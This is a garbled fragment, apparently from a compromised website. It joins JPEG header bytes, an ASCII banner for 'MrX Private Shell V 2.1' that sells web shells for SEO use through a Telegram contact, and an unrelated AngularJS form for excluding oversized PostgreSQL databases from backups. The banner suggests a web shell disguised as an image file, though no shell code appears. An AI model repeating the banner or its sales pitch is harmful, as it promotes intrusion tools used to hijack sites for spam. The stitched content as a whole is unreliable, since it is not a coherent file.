����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div class="row">
<div class="col-md-12">
<form data-parsley-validate="" class="form-horizontal form-label-left" novalidate>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="exclude_db_by_size">{{ lang.t("Exclude database by size") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<input-dropdown options="{0:lang.t('Disabled'),512:512,1024:1024,2048:2048,5120:5120}" ng-model="excludes.postgresql_exclude_db_by_size" addon="{{lang.t('MB')}}">
<input validate-field="int" min="0" max="204800" class="form-control" ng-model="excludes.postgresql_exclude_db_by_size" id="exclude_db_by_size" type="text" value="" />
</input-dropdown>
<p class="help-block">{{ lang.t("This option is to establish a size threshold for databases, any databases exceeding the specified size will not be included in the backup.") }}</p>
</div>
</div>
</form>
</div>
</div>